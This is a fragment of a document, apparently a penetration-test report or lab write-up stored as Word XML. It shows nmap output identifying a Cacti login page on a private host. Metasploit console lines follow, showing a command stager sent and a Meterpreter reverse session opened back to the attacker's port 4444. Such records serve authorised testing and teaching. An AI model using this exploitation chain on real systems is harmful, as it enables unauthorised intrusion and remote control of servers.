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04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Thu Jul  4 18:28:03 2024 as: nmap -sV -sC -Pn --script http-title -iL targets.txt -oN nmap_results.txt</w:t>
        <w:br/>
        <w:t>Nmap scan report for 10.33.102.225</w:t>
        <w:br/>
        <w:t>Host is up (0.00066s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(0.00071s latency).</w:t>
        <w:br/>
        <w:t>Not shown: 998 closed ports</w:t>
        <w:br/>
        <w:t>PORT   STATE SERVICE VERSION</w:t>
        <w:br/>
        <w:t>22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)</w:t>
        <w:br/>
        <w:t>80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))</w:t>
        <w:br/>
        <w:t>|_http-server-header: Apache/2.4.52 (Ubuntu)</w:t>
        <w:br/>
        <w:t>|_http-title: Login to Cacti</w:t>
        <w:br/>
        <w:t>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
        <w:br/>
        <w:br/>
        <w:t>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
        <w:br/>
        <w:t># Nmap done at Thu Jul  4 18:28:10 2024 -- 2 IP addresses (2 hosts up) scanned in 7.85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Found exploitable local_data_id 15 for host_id 1</w:t>
        <w:br/>
        <w:t>[*] Command Stager progress - 100.00% done (1118/1118 bytes)</w:t>
        <w:br/>
        <w:t>[*] Sending stage (1017704 bytes) to 10.33.102.225</w:t>
        <w:br/>
        <w:t>[*] Meterpreter session 1 opened (10.33.102.224:4444 -&gt; 10.33.102.225:56104) at 2024-07-04 18:31:37 +0700</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10.33.102.225:56104 (172.24.</w:t>
        <w:br/>
        <w:t xml:space="preserve">                                                          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